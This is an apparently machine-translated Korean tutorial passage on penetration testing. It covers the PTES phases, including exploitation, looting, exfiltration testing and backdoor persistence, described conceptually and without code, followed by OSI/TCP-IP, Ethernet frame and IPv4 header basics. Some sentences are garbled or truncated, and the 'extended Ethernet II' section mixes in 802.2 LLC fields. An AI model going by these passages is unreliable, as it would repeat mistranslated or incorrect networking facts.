Python 침투 테스트-빠른 가이드
펜 테스트 또는 침투 테스트는 취약성을 악용하기 위해 컴퓨터 시스템에 대한 사이버 공격을 시뮬레이션하여 IT 인프라의 보안을 평가하려는 시도로 정의 될 수 있습니다.
취약성 스캔과 침투 테스트의 차이점은 무엇입니까? 취약성 스캐닝은 단순히 알려진 취약성을 식별하고 앞서 말했듯이 침투 테스트는 취약성을 악용하려는 시도입니다. 침투 테스트는 시스템에서 무단 액세스 또는 기타 악의적 인 활동이 가능한지 확인하는 데 도움이됩니다.
수동 또는 자동화 기술을 사용하여 서버, 웹 애플리케이션, 무선 네트워크, 모바일 장치 및 기타 잠재적 인 노출 지점에 대한 침투 테스트를 수행 할 수 있습니다. 침투 테스트로 인해 어떤 종류의 취약점을 악용하는 경우 전략적 결론에 도달하려면 동일한 취약점을 IT 및 네트워크 시스템 관리자에게 전달해야합니다.
침투 (펜) 테스트의 중요성
이 섹션에서는 침투 테스트의 중요성에 대해 알아 봅니다. 중요성에 대해 알기 위해 다음 사항을 고려하십시오.
조직의 보안
침투 테스트의 중요성은 조직의 보안에 대한 자세한 평가를 통해 조직에 확신을 제공한다는 점에서 이해할 수 있습니다.
조직의 기밀성 보호
침투 테스트를 통해 피해를 입기 전에 잠재적 인 위협을 발견하고 해당 조직의 기밀을 보호 할 수 있습니다.
보안 정책 구현
침투 테스트는 조직의 보안 정책 구현과 관련하여 우리를 보장 할 수 있습니다.
네트워크 효율성 관리
침투 테스트의 도움으로 네트워크의 효율성을 관리 할 수 있습니다. 방화벽, 라우터 등과 같은 장치의 보안을 면밀히 조사 할 수 있습니다.
조직의 안전 보장
네트워크 설계의 변경 사항을 구현하거나 소프트웨어, 하드웨어 등을 업데이트하려는 경우 침투 테스트가 모든 종류의 취약성에 대해 조직의 안전을 보장한다고 가정합니다.
좋은 펜 테스터는 누구입니까?
침투 테스터는 조직이 취약성을 식별하여 사이버 공격에 대한 방어를 강화하도록 돕는 소프트웨어 전문가입니다. 침투 테스터는 테스트를 위해 수동 기술이나 자동화 된 도구를 사용할 수 있습니다.
이제 좋은 침투 시험기의 다음과 같은 중요한 특성을 고려해 보겠습니다.
네트워킹 및 애플리케이션 개발에 대한 지식
좋은 펜스 터는 구성 설정과 코딩을 다룰 것으로 예상되기 때문에 애플리케이션 개발, 데이터베이스 관리 및 네트워킹에 대한 지식이 있어야합니다.
뛰어난 사상가
Pentester는 뛰어난 사상가 여야하며 최상의 결과를 얻기 위해 특정 과제에 다양한 도구와 방법론을 적용하는 것을 주저하지 않을 것입니다.
절차에 대한 지식
좋은 펜 테스터는 목적, 한계 및 절차의 정당성과 같은 각 침투 테스트의 범위를 설정하기위한 지식이 있어야합니다.
최신 기술
펜 테스터는 언제든 기술에 변화가있을 수 있기 때문에 자신의 기술 능력이 최신이어야합니다.
보고서 작성에 능숙
침투 테스트를 성공적으로 구현 한 후, 펜 테스터는 최종 보고서에서 모든 발견 사항과 잠재적 위험을 언급해야합니다. 따라서 보고서 작성에 능숙해야합니다.
사이버 보안에 대한 열정
열정적 인 사람은 인생에서 성공할 수 있습니다. 마찬가지로 사이버 증권에 대한 열정이있는 사람은 좋은 펜 테스터가 될 수 있습니다.
침투 테스트 범위
이제 침투 테스트의 범위에 대해 알아 보겠습니다. 다음 두 종류의 테스트는 침투 테스트의 범위를 정의 할 수 있습니다.
비파괴 검사 (NDT)
비파괴 테스트는 시스템에 어떤 종류의 위험도주지 않습니다. NDT는 시스템, 물체 등에 해를 끼치 지 않고 위험 해지기 전에 결함을 찾는 데 사용됩니다. 침투 테스트를 수행하는 동안 NDT는 다음 작업을 수행합니다.
원격 시스템 스캔
이 테스트는 원격 시스템에서 가능한 취약점을 검색하고 식별합니다.
확인
취약점을 발견 한 후 발견 된 모든 사항을 확인합니다.
원격 시스템의 적절한 활용
NDT에서 펜 테스터는 원격 시스템을 적절하게 활용합니다. 이는 중단을 방지하는 데 도움이됩니다.
Note − 반면, 침투 테스트를 수행하는 동안 NDT는 Denial-of-Service (DoS) attack.
파괴적인 테스트
파괴적인 테스트는 시스템을 위험에 빠뜨릴 수 있습니다. 비파괴 테스트보다 더 비싸고 더 많은 기술이 필요합니다. 침투 테스트를 수행하는 동안 파괴 테스트는 다음 작업을 수행합니다.
Denial-of-Service (DoS) attack − 파괴 테스트는 DoS 공격을 수행합니다.
Buffer overflow attack − 또한 시스템 충돌로 이어질 수있는 버퍼 오버 플로우 공격을 수행합니다.
모의 침투 테스트를 위해 무엇을 설치해야합니까?
침투 테스트 기술 및 도구는 귀하가 소유하거나 이러한 도구를 실행할 수있는 권한이있는 환경에서만 실행되어야합니다. 허가없이 침투 테스트하는 것은 불법이므로 그렇게 할 권한이없는 환경에서는 이러한 기술을 실행해서는 안됩니다.
가상화 제품군을 설치하여 침투 테스트를 연습 할 수 있습니다. VMware Player( www.vmware.com/products/player ) 또는Oracle VirtualBox −
www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html
현재 버전에서 가상 머신 (VM)을 만들 수도 있습니다.
Kali Linux ( www.kali.org/downloads/ )
Samurai Web Testing Framework (http://samurai.inguardians.com/)
Metasploitable ( www.offensivesecurity.com/metasploit-unleashed/Requirements )
최근에는 정부와 민간 조직 모두 사이버 보안을 전략적 우선 순위로 삼았습니다. 사이버 범죄자들은 종종 다른 공격 벡터를 사용하여 정부 및 민간 조직을 소프트 타겟으로 삼았습니다. 안타깝게도 효율적인 정책, 표준 및 정보 시스템의 복잡성으로 인해 사이버 범죄자들은 많은 목표를 가지고 있으며 시스템을 악용하고 정보를 도용하는데도 성공하고 있습니다.
침투 테스트는 사이버 공격의 위험을 완화하는 데 사용할 수있는 하나의 전략입니다. 침투 테스트의 성공 여부는 효율적이고 일관된 평가 방법에 달려 있습니다.
우리는 침투 테스트와 관련된 다양한 평가 방법을 가지고 있습니다. 방법론 사용의 이점은 평가자가 환경을 일관되게 평가할 수 있다는 것입니다. 다음은 몇 가지 중요한 방법론입니다.
오픈 소스 보안 테스트 방법론 매뉴얼 (OSSTMM)
오픈 웹 애플리케이션 보안 프로젝트 (OWASP)
NIST (National Institute of Standards and Technology)
침투 테스트 실행 표준 (PTES)
PTES는 무엇입니까?
PTES, 침투 테스트 실행 표준은 이름에서 알 수 있듯이 침투 테스트를위한 평가 방법입니다. 침투 테스트와 관련된 모든 것을 다룹니다. 평가자가 접할 수있는 다양한 환경과 관련된 PTES 내에는 여러 가지 기술 지침이 있습니다. 이는 기술 지침에 산업 표준 도구 내에서 환경을 다루고 평가하기위한 제안이 있기 때문에 새로운 평가자가 PTES를 사용할 때의 가장 큰 장점입니다.
다음 섹션에서는 PTES의 여러 단계에 대해 알아 봅니다.
PTES의 7 단계
침투 테스트 실행 표준 (PTES)은 7 단계로 구성됩니다. 이 단계는 침투 테스트와 관련된 모든 것을 다룹니다. 초기 커뮤니케이션 및 침투 테스트이면의 추론부터 테스터가 백그라운드에서 작업하는 인텔리전스 수집 및 위협 모델링 단계에 이르기까지. 이를 통해 취약성 조사, 악용 및 사후 악용을 통해 테스트 된 조직을 더 잘 이해할 수 있습니다. 여기에서 테스터의 기술 보안 전문 지식은 참여에 대한 비즈니스 이해와 비판적으로 결합되며, 마지막으로 전체 프로세스를 캡처하는보고에 대해 고객에게 이해가되고 가장 가치를 제공하는 방식으로 결합됩니다.
다음 섹션에서 PTES의 7 단계에 대해 배웁니다.
참여 전 상호 작용 단계
이것은 PTES의 첫 번째이자 매우 중요한 단계입니다. 이 단계의 주요 목표는 침투 테스트의 성공적인 사전 참여 단계에 도움이되는 사용 가능한 도구와 기술을 설명하는 것입니다. 이 단계를 구현하는 동안 실수가 있으면 나머지 평가에 큰 영향을 미칠 수 있습니다. 이 단계는 다음으로 구성됩니다.
평가 요청
이 단계가 시작되는 첫 번째 부분은 조직의 평가 요청 작성입니다. ㅏRequest for Proposal (RFP) 환경, 필요한 평가 종류 및 조직의 기대치에 대한 세부 정보가 포함 된 문서가 평가자에게 제공됩니다.
입찰
이제 RFP 문서, 여러 평가 회사 또는 개별 유한 책임 회사 (LLC)가 입찰하고 요청 된 작업, 가격 및 기타 특정 매개 변수와 일치하는 입찰이 승리합니다.
약혼 편지 (EL) 서명
이제 입찰에 성공한 조직과 당사자가 EL (Engagement Letter) 계약을 체결합니다. 편지에는statement of work (SOW) 그리고 최종 제품.
범위 지정 회의
EL이 서명되면 범위의 미세 조정을 시작할 수 있습니다. 이러한 회의는 조직과 당사자가 특정 범위를 미세 조정하는 데 도움이됩니다. 범위 지정 회의의 주요 목표는 테스트 대상을 논의하는 것입니다.
스코프 크리프 처리
범위 크립은 클라이언트가 약속 한 수준의 작업을 추가하거나 확장하여 지불하기로 약속 한 것보다 더 많은 것을 얻을 수있는 것입니다. 그렇기 때문에 원래 범위의 수정은 시간과 자원으로 인해 신중하게 고려해야합니다. 또한 이메일, 서명 된 문서 또는 승인 된 편지 등과 같은 문서화 된 양식으로 작성해야합니다.
설문지
고객과의 초기 커뮤니케이션 중에 고객이 참여 범위를 적절하게 추정하기 위해 답변해야하는 몇 가지 질문이 있습니다. 이러한 질문은 클라이언트가 침투 테스트를 통해 얻고 자하는 것을 더 잘 이해할 수 있도록 설계되었습니다. 고객이 자신의 환경에 대해 침투 테스트를 수행하려는 이유 침투 테스트 중에 특정 유형의 테스트를 원하는지 여부.
테스트 수행 방법
사전 참여 단계의 마지막 부분은 테스트 수행 절차를 결정하는 것입니다. White Box, Black Box, Gray Box, Double-blind 테스트와 같은 다양한 테스트 전략 중에서 선택할 수 있습니다.
다음은 요청할 수있는 평가의 몇 가지 예입니다.
- 네트워크 침투 테스트
- 웹 애플리케이션 침투 테스트
- 무선 네트워크 침투 테스트
- 물리적 침투 테스트
- 사회 공학
- Phishing
- VoIP (Voice Over Internet Protocol)
- 내부 네트워크
- 외부 네트워크
정보 수집 단계
PTES의 두 번째 단계 인 인텔리전스 수집은 취약성 평가 및 악용 단계에서 대상에 침투 할 때 활용할 수있는 최대한 많은 정보를 수집하기 위해 대상에 대한 예비 조사를 수행하는 것입니다. 조직이 평가 팀의 외부 노출을 결정하는 데 도움이됩니다. 수집하는 정보는 다음과 같은 세 단계로 나눌 수 있습니다.
레벨 1 정보 수집
자동화 된 도구는이 수준의 정보를 거의 전적으로 얻을 수 있습니다. 레벨 1 정보 수집 노력은 규정 준수 요구 사항을 충족하는 데 적합해야합니다.
레벨 2 정보 수집
이 수준의 정보는 몇 가지 수동 분석과 함께 수준 1의 자동화 도구를 사용하여 얻을 수 있습니다. 이 수준은 물리적 위치, 비즈니스 관계, 조직도 등과 같은 정보를 포함하여 비즈니스를 잘 이해해야합니다. 수준 2 정보 수집 노력은 장기 보안 전략과 같은 다른 요구와 함께 규정 준수 요구 사항을 충족하는 데 적절해야합니다. 소규모 제조업체 인수 등
레벨 3 정보 수집
이 수준의 정보 수집은 가장 진보 된 침투 테스트에서 사용됩니다. 레벨 3 정보 수집에는 많은 수작업 분석과 함께 레벨 1 및 레벨 2의 모든 정보가 필요합니다.
위협 모델링 단계
이것은 PTES의 세 번째 단계입니다. 침투 테스트를 올바르게 실행하려면 위협 모델링 접근 방식이 필요합니다. 위협 모델링은 침투 테스트의 일부로 사용되거나 여러 요인에 따라 직면 할 수 있습니다. 침투 테스트의 일부로 위협 모델링을 사용하는 경우 두 번째 단계에서 수집 된 정보는 첫 번째 단계로 롤백됩니다.
다음 단계는 위협 모델링 단계를 구성합니다.
필요한 관련 정보를 수집합니다.
1 차 및 2 차 자산을 식별하고 분류해야합니다.
위협 및 위협 커뮤니티를 식별하고 분류해야합니다.
1 차 및 2 차 자산에 대한 위협 커뮤니티를 매핑해야합니다.
위협 커뮤니티 및 에이전트
다음 표는 조직 내 위치와 함께 관련 위협 커뮤니티 및 에이전트를 나열합니다.
위치 | 내부의 | 외부 |
---|---|---|
Threat agents/communities | 직원 | 비즈니스 파트너 |
관리인 | 계약자 | |
관리자 (네트워크, 시스템) | 경쟁자 | |
엔지니어 | 공급자 | |
기술자 | 국민 국가 | |
일반 사용자 커뮤니티 | 해커 |
위협 모델링 평가를 수행하는 동안 위협의 위치는 내부에있을 수 있음을 기억해야합니다. 자격 증명을 브로드 캐스팅하여 조직의 보안을 위태롭게하는 피싱 이메일 하나 또는 성가신 직원 한 명만 있으면됩니다.
취약성 분석 단계
이것은 평가자가 추가 테스트를 위해 실행 가능한 목표를 식별하는 PTES의 네 번째 단계입니다. PTES의 처음 세 단계에서는 조직에 대한 세부 정보 만 추출되었으며 평가자는 테스트를위한 리소스를 건드리지 않았습니다. PTES에서 가장 시간이 많이 걸리는 단계입니다.
다음 단계는 취약점 분석을 구성합니다-
취약성 테스트
호스트 및 서비스의 시스템 및 애플리케이션에서 잘못된 구성 및 안전하지 않은 애플리케이션 설계와 같은 결함을 발견하는 프로세스로 정의 될 수 있습니다. 테스터는 취약성 분석을 수행하기 전에 테스트 및 원하는 결과의 범위를 적절하게 지정해야합니다. 취약점 테스트는 다음과 같은 유형이 될 수 있습니다.
- 적극적인 테스트
- 패시브 테스트
다음 섹션에서 두 가지 유형에 대해 자세히 설명합니다.
적극적인 테스트
여기에는 보안 취약점이 있는지 테스트중인 구성 요소와의 직접적인 상호 작용이 포함됩니다. 구성 요소는 네트워크 장치의 TCP 스택과 같은 낮은 수준 또는 웹 기반 인터페이스와 같은 높은 수준 일 수 있습니다. 활성 테스트는 다음 두 가지 방법으로 수행 할 수 있습니다.
자동화 된 활성 테스트
이 소프트웨어를 사용하여 대상과 상호 작용하고, 응답을 검사하고, 이러한 응답을 기반으로 구성 요소의 취약점이 존재하는지 여부를 결정합니다. 수동 활성 테스트와 비교하여 자동화 된 활성 테스트의 중요성은 시스템에 수천 개의 TCP 포트가 있고 테스트를 위해 모두 수동으로 연결해야한다면 상당한 시간이 소요된다는 사실에서 알 수 있습니다. 그러나 자동화 된 도구를 사용하면 많은 시간과 노동 요구 사항을 줄일 수 있습니다. 네트워크 취약성 스캔, 포트 스캔, 배너 잡기, 웹 애플리케이션 스캔은 자동화 된 활성 테스트 도구를 사용하여 수행 할 수 있습니다.
수동 능동 테스트
수동 효과적인 테스트는 자동화 된 활성 테스트와 비교할 때 더 효과적입니다. 오류 범위는 항상 자동화 된 프로세스 또는 기술에 존재합니다. 그렇기 때문에 대상 시스템에서 사용 가능한 각 프로토콜 또는 서비스에 대한 수동 직접 연결을 실행하여 자동화 된 테스트 결과를 검증하는 것이 항상 권장됩니다.
패시브 테스트
수동 테스트에는 구성 요소와의 직접적인 상호 작용이 포함되지 않습니다. 다음 두 가지 기술을 사용하여 구현할 수 있습니다.
메타 데이터 분석
이 기술은 파일 자체의 데이터가 아닌 파일을 설명하는 데이터를 보는 것과 관련됩니다. 예를 들어 MS 워드 파일에는 작성자 이름, 회사 이름, 문서가 마지막으로 수정되고 저장된 날짜 및 시간과 관련된 메타 데이터가 있습니다. 공격자가 메타 데이터에 수동적으로 액세스 할 수 있다면 보안 문제가있을 수 있습니다.
교통 모니터링
내부 네트워크에 연결하고 오프라인 분석을 위해 데이터를 캡처하는 기술로 정의 할 수 있습니다. 주로 캡처하는 데 사용됩니다“leaking of data” 교환 네트워크에.
확인
취약성 테스트 후 발견 사항의 유효성 검사가 매우 필요합니다. 다음 기술을 사용하여 수행 할 수 있습니다.
도구 간의 상관 관계
평가자가 여러 자동화 된 도구를 사용하여 취약성 테스트를 수행하는 경우 결과를 검증하기 위해 이러한 도구간에 상관 관계를 갖는 것이 매우 필요합니다. 도구간에 이러한 종류의 상관 관계가 없으면 결과가 복잡해질 수 있습니다. 특정 항목의 상관 관계와 항목의 범주 적 상관 관계로 나눌 수 있습니다.
프로토콜 별 검증
프로토콜의 도움으로 유효성 검사를 수행 할 수도 있습니다. VPN, Citrix, DNS, 웹, 메일 서버를 사용하여 결과를 확인할 수 있습니다.
연구
시스템의 취약성을 발견하고 검증 한 후에는 문제 식별의 정확성을 결정하고 침투 테스트 범위 내에서 취약성의 잠재적 악용 가능성을 조사하는 것이 필수적입니다. 연구는 공개적으로 또는 비공개로 수행 할 수 있습니다. 공개 조사를 수행하는 동안 취약성 데이터베이스 및 공급 업체 권고를 사용하여보고 된 문제의 정확성을 확인할 수 있습니다. 반면에 개인 조사를 수행하는 동안 복제 환경을 설정하고 퍼징 또는 테스트 구성과 같은 기술을 적용하여보고 된 문제의 정확성을 확인할 수 있습니다.
착취 단계
이것은 PTES의 다섯 번째 단계입니다. 이 단계는 보안 제한을 우회하여 시스템 또는 리소스에 대한 액세스 권한을 얻는 데 중점을 둡니다. 이 단계에서는 이전 단계에서 수행 한 모든 작업이 시스템에 대한 액세스 권한을 얻습니다. 시스템에 액세스하는 데 사용되는 다음과 같은 몇 가지 일반적인 용어가 있습니다.
- Popped
- Shelled
- Cracked
- Exploited
익스플로잇 단계에서 로그인 시스템은 코드, 원격 익스플로잇, 익스플로잇 생성, 안티 바이러스 우회를 통해 수행 할 수 있으며 약한 자격 증명을 통한 로깅만큼 간단 할 수 있습니다. 액세스 권한을 얻은 후, 즉, 주요 진입 점을 식별 한 후 평가자는 고 가치 대상 자산을 식별하는 데 집중해야합니다. 취약성 분석 단계가 제대로 완료 되었다면 고 가치 대상 목록을 준수해야합니다. 궁극적으로 공격 벡터는 성공 확률과 조직에 대한 가장 큰 영향을 고려해야합니다.
악용 후 단계
이것은 PTES의 여섯 번째 단계입니다. 평가자는이 단계에서 다음 활동을 수행합니다.
인프라 분석
침투 테스트 중에 사용 된 전체 인프라에 대한 분석은이 단계에서 수행됩니다. 예를 들어, 네트워크 또는 네트워크 구성 분석은 인터페이스, 라우팅, DNS 서버, 캐시 된 DNS 항목, 프록시 서버 등을 사용하여 수행 할 수 있습니다.
약탈
대상 호스트에서 정보를 얻는 것으로 정의 할 수 있습니다. 이 정보는 사전 평가 단계에서 정의 된 목표와 관련이 있습니다. 이 정보는 시스템에 설치된 프로그램, 데이터베이스 서버, 프린터 등과 같은 특정 서버에서 얻을 수 있습니다.
데이터 유출
이 활동에서 평가자는 가능한 모든 유출 경로에 대한 매핑 및 테스트를 수행하여 제어 강도 측정, 즉 조직에서 민감한 정보를 탐지 및 차단할 수 있도록해야합니다.
지속성 만들기
이 활동에는 인증이 필요한 백도어 설치, 필요할 때 백도어 재부팅 및 복잡한 암호로 대체 계정 생성이 포함됩니다.
대청소
이름에서 알 수 있듯이이 프로세스는 침투 테스트가 완료된 후 시스템 정리에 대한 요구 사항을 다룹니다. 이 활동에는 원래 값으로의 복귀 시스템 설정, 애플리케이션 구성 매개 변수, 설치된 모든 백도어 제거 및 생성 된 모든 사용자 계정이 포함됩니다.
보고
이것은 PTES의 마지막이자 가장 중요한 단계입니다. 여기서 클라이언트는 침투 테스트 완료 후 최종 보고서를 기준으로 지불합니다. 보고서는 기본적으로 평가자가 시스템에 대해 수행 한 결과를 반영합니다. 다음은 좋은 보고서의 필수 부분입니다.
요약
이것은 침투 테스트의 특정 목표와 테스트 연습의 높은 수준의 결과에 대해 독자에게 전달하는 보고서입니다. 대상 청중은 최고 스위트 자문위원회의 구성원이 될 수 있습니다.
줄거리
보고서에는 참여 기간 동안 수행 된 작업, 실제 보안 결과 또는 약점 및 조직이 수립 한 긍정적 인 통제를 설명하는 스토리 라인이 포함되어야합니다.
개념 증명 / 기술 보고서
개념 증명 또는 기술 보고서는 테스트의 기술적 세부 사항과 사전 계약 연습에서 핵심 성공 지표로 합의 된 모든 측면 / 구성 요소로 구성되어야합니다. 기술 보고서 섹션에서는 테스트의 범위, 정보, 공격 경로, 영향 및 수정 제안에 대해 자세히 설명합니다.
침투 테스트를 수행하려면 펜 테스터가 IP 주소, 클래스 별 서브넷, 클래스없는 서브넷, 포트 및 브로드 캐스트 네트워크와 같은 기본 네트워킹 개념에 대해 알고 있어야한다고 항상 들었습니다. 첫 번째 이유는 어떤 호스트가 승인 된 범위에 살고 있는지, 어떤 서비스, 포트 및 기능이 열려 있고 응답하는지와 같은 활동이 평가자가 침투 테스트에서 수행 할 활동의 종류를 결정하기 때문입니다. 환경은 계속 변하고 시스템은 종종 재 할당됩니다. 따라서 이전 취약점이 다시 발생할 수 있으며 네트워크 스캔에 대한 충분한 지식이 없으면 초기 스캔을 다시 수행해야 할 수 있습니다. 다음 섹션에서는 네트워크 통신의 기본 사항에 대해 설명합니다.
참조 모델
참조 모델은 컴퓨터 네트워크를 사용하는 사람들이 물리적 범위가 넓고 네트워크 장치가 이기종 아키텍처를 가질 수 있기 때문에 전 세계적으로 허용되는 표준화 수단을 제공합니다. 이기종 장치간에 통신을 제공하려면 이러한 장치가 통신 할 수있는 방법을 제공하는 표준 모델, 즉 참조 모델이 필요합니다.
OSI 모델과 TCP / IP 참조 모델과 같은 두 가지 참조 모델이 있습니다. 그러나 OSI 모델은 가상 모델이지만 TCP / IP는 실용적인 모델입니다.
OSI 모델
개방형 시스템 인터페이스는 ISO (International Organization of Standardization)에 의해 설계되었으므로 ISO-OSI 모델이라고도합니다.
OSI 모델은 다음 다이어그램과 같이 7 개의 계층으로 구성됩니다. 각 계층에는 특정 기능이 있지만 각 계층은 위 계층에 서비스를 제공합니다.
물리적 계층
물리 계층은 다음 활동을 담당합니다.
물리적 연결 활성화, 유지 및 비활성화.
전송에 필요한 전압 및 데이터 속도를 정의합니다.
디지털 비트를 전기 신호로 변환합니다.
연결이 단방향, 반이중 또는 전이중인지 결정합니다.
데이터 링크 계층
데이터 링크 계층은 다음과 같은 기능을 수행합니다.
물리적 링크를 통해 전송 될 정보에 대한 동기화 및 오류 제어를 수행합니다.
오류 감지를 활성화하고 전송할 데이터에 오류 감지 비트를 추가합니다.
네트워크 계층
네트워크 계층은 다음과 같은 기능을 수행합니다.
다양한 채널을 통해 다른 쪽 끝으로 신호를 라우팅합니다.
어떤 라우트 데이터를 취해야하는지 결정하여 네트워크 컨트롤러 역할을합니다.
나가는 메시지를 패킷으로 나누고 들어오는 패킷을 더 높은 수준의 메시지로 조합합니다.
전송 계층
전송 계층은 다음과 같은 기능을 수행합니다.
데이터 전송이 병렬 경로 또는 단일 경로에서 발생해야하는지 결정합니다.
다중화를 수행하고 데이터를 분할합니다.
데이터 그룹을 더 작은 단위로 분할하여 네트워크 계층에서보다 효율적으로 처리합니다.
전송 계층은 한쪽 끝에서 다른 쪽 끝으로 데이터 전송을 보장합니다.
세션 계층
세션 계층은 다음과 같은 기능을 수행합니다.
메시지를 관리하고 서로 다른 두 응용 프로그램 간의 대화를 동기화합니다.
로그온 및 로그 오프, 사용자 식별, 청구 및 세션 관리를 제어합니다.
프리젠 테이션 레이어
프레젠테이션 계층은 다음과 같은 기능을 수행합니다.
이 계층은 정보가 수신 시스템이 이해하고 사용할 수있는 형태로 전달되도록합니다.
응용 계층
응용 프로그램 계층은 다음 기능을 수행합니다.
여러 가지 정보 조작, 정보 파일 재전송, 결과 배포 등 다양한 서비스를 제공합니다.
LOGIN 또는 암호 확인과 같은 기능도 응용 프로그램 계층에서 수행됩니다.
TCP / IP 모델
TCP / IP (Transmission Control Protocol and Internet Protocol) 모델은 실용적인 모델이며 인터넷에서 사용됩니다.
TCP / IP 모델은 두 계층 (물리적 및 데이터 링크 계층)을 호스트-네트워크 계층이라는 하나의 계층으로 결합합니다. 다음 다이어그램은 TCP / IP 모델의 다양한 계층을 보여줍니다.
응용 계층
이 계층은 OSI 모델의 계층과 동일하며 다음과 같은 기능을 수행합니다.
여러 가지 정보 조작, 정보 파일 재전송, 결과 배포 등 다양한 서비스를 제공합니다.
응용 프로그램 계층은 LOGIN 또는 암호 확인과 같은 기능도 수행합니다.
다음은 응용 프로그램 계층에서 사용되는 다른 프로토콜입니다.
- TELNET
- FTP
- SMTP
- DN
- HTTP
- NNTP
전송 계층
OSI 모델의 전송 계층과 동일한 기능을 수행합니다. 전송 계층과 관련된 다음 중요 사항을 고려하십시오.
종단 간 전송을 위해 TCP 및 UDP 프로토콜을 사용합니다.
TCP는 안정적이고 연결 지향적 인 프로토콜입니다.
TCP는 흐름 제어도 처리합니다.
UDP는 신뢰할 수 없으며 연결이 적은 프로토콜은 흐름 제어를 수행하지 않습니다.
이 계층에는 TCP / IP 및 UDP 프로토콜이 사용됩니다.
인터넷 계층
이 계층의 기능은 호스트가 패킷을 네트워크에 삽입 한 다음 대상으로 독립적으로 이동할 수 있도록하는 것입니다. 그러나 패킷 수신 순서는 전송 된 순서와 다를 수 있습니다.
인터넷 프로토콜 (IP)은 인터넷 계층에 사용됩니다.
호스트-네트워크 계층
이것은 TCP / IP 모델에서 가장 낮은 계층입니다. 호스트는 프로토콜을 사용하여 네트워크에 연결해야 IP 패킷을 보낼 수 있습니다. 이 프로토콜은 호스트마다, 네트워크마다 다릅니다.
이 계층에서 사용되는 다른 프로토콜은 다음과 같습니다.
- ARPANET
- SATNET
- LAN
- 패킷 라디오
유용한 아키텍처
다음은 네트워크 통신에 사용되는 몇 가지 유용한 아키텍처입니다.
이더넷 프레임 아키텍처
Robert Metcalfe라는 엔지니어는 1973 년 IEEE 표준 802.3에 따라 정의 된 이더넷 네트워크를 처음으로 발명했습니다.이 네트워크는 워크 스테이션과 프린터간에 데이터를 상호 연결하고 전송하는 데 처음 사용되었습니다. LAN의 80 % 이상이 속도, 저렴한 비용 및 설치 용이성 때문에 이더넷 표준을 사용합니다. 반면에 프레임에 대해 이야기하면 데이터가 호스트에서 호스트로 이동합니다. 프레임은 MAC 주소, IP 헤더, 시작 및 끝 구분 기호 등과 같은 다양한 구성 요소로 구성됩니다.
이더넷 프레임은 프리앰블과 SFD로 시작합니다. 이더넷 헤더에는 소스 및 대상 MAC 주소가 모두 포함되며 그 뒤에 프레임 페이로드가 있습니다. 마지막 필드는 오류를 감지하는 데 사용되는 CRC입니다. 기본 이더넷 프레임 구조는 IEEE 802.3 표준에 정의되어 있으며 아래에 설명되어 있습니다.
이더넷 (IEEE 802.3) 프레임 형식
이더넷 패킷은 이더넷 프레임을 페이로드로 전송합니다. 다음은 각 필드의 설명과 함께 이더넷 프레임의 그래픽 표현입니다.
분야 명 | 전문 | SFD (프레임 구분자 시작) | 목적지 MAC | 소스 MAC | 유형 | 데이터 | CRC |
---|---|---|---|---|---|---|---|
크기 (바이트) | 7 | 1 | 6 | 6 | 2 | 46-1500 | 4 |
전문
이더넷 프레임 앞에는 7 바이트 크기의 프리앰블이옵니다.이 프레임은 수신 시스템에 프레임이 시작되고 있음을 알리고 송신자와 수신자가 비트 동기화를 설정할 수 있도록합니다.
SFD (프레임 구분 기호 시작)
대상 MAC 주소 필드가 다음 바이트로 시작 함을 나타내는 데 사용되는 1 바이트 필드입니다. 때때로 SFD 필드는 Preamble의 일부로 간주됩니다. 이것이 프리앰블이 많은 곳에서 8 바이트로 간주되는 이유입니다.
Destination MAC − 이것은 수신 시스템의 주소가있는 6 바이트 필드입니다.
Source MAC − 이것은 송신 시스템의 주소가있는 6 바이트 필드입니다.
Type− 프레임 내부의 프로토콜 종류를 정의합니다. 예 : IPv4 또는 IPv6. 크기는 2 바이트입니다.
Data− Payload라고도하며 실제 데이터가 여기에 삽입됩니다. 길이는 46-1500 바이트 여야합니다. 길이가 46 바이트 미만이면 가능한 최소 길이 (예 : 46)를 충족하기 위해 패딩 0이 추가됩니다.
CRC (Cyclic Redundancy Check) − 32 비트 CRC가 포함 된 4 바이트 필드로 손상된 데이터를 감지 할 수 있습니다.
확장 이더넷 프레임 (이더넷 II 프레임) 형식
다음은 1500 바이트보다 큰 페이로드를 얻을 수있는 확장 이더넷 프레임의 그래픽 표현입니다.
분야 명 | 목적지 MAC | 소스 MAC | 유형 | DSAP | SSAP | Ctrl | 데이터 | CRC |
---|---|---|---|---|---|---|---|---|
크기 (바이트) | 6 | 6 | 2 | 1 | 1 | 1 | > 46 | 4 |
IEEE 802.3 이더넷 프레임과 다른 필드에 대한 설명은 다음과 같습니다.
DSAP (Destination Service Access Point)
DSAP는 메시지를 수신 할 네트워크 계층 엔티티의 논리적 주소를 나타내는 1 바이트 길이의 필드입니다.
SSAP (소스 서비스 액세스 포인트)
SSAP는 메시지를 만든 네트워크 계층 엔터티의 논리적 주소를 나타내는 1 바이트 길이의 필드입니다.
Ctrl
1 바이트 제어 필드입니다.
IP 패킷 아키텍처
인터넷 프로토콜은 TCP / IP 프로토콜 제품군의 주요 프로토콜 중 하나입니다. 이 프로토콜은 OSI 모델의 네트워크 계층과 TCP / IP 모델의 인터넷 계층에서 작동합니다. 따라서이 프로토콜은 논리 주소를 기반으로 호스트를 식별하고 기본 네트워크를 통해 호스트간에 데이터를 라우팅 할 책임이 있습니다. IP는 IP 주소 지정 체계로 호스트를 고유하게 식별하는 메커니즘을 제공합니다. IP는 최선의 전달 방식을 사용합니다. 즉, 패킷이 대상 호스트로 전달된다는 보장은 없지만 대상에 도달하기 위해 최선을 다합니다.
이후 섹션에서는 두 가지 다른 버전의 IP에 대해 알아 봅니다.
IPv4
이것은 32 비트 논리 주소를 사용하는 인터넷 프로토콜 버전 4입니다. 다음은 필드 설명과 함께 IPv4 헤더 다이어그램입니다.
버전
이것은 사용 된 인터넷 프로토콜의 버전입니다. 예 : IPv4.
IHL
인터넷 헤더 길이; 전체 IP 헤더의 길이.
DSCP
차별화 된 서비스 코드 포인트; 이것이 서비스 유형입니다.
ECN
명시 적 혼잡 알림; 경로에서 본 혼잡에 대한 정보를 전달합니다.
총 길이
전체 IP 패킷의 길이 (IP 헤더 및 IP 페이로드 포함).
신분증
IP 패킷이 전송 중에 조각화되면 모든 조각에 동일한 식별 번호가 포함됩니다.
플래그
네트워크 리소스에서 요구하는대로 IP 패킷이 처리하기에 너무 큰 경우 이러한 '플래그'는 조각화 될 수 있는지 여부를 알려줍니다. 이 3 비트 플래그에서 MSB는 항상 '0'으로 설정됩니다.
조각 오프셋
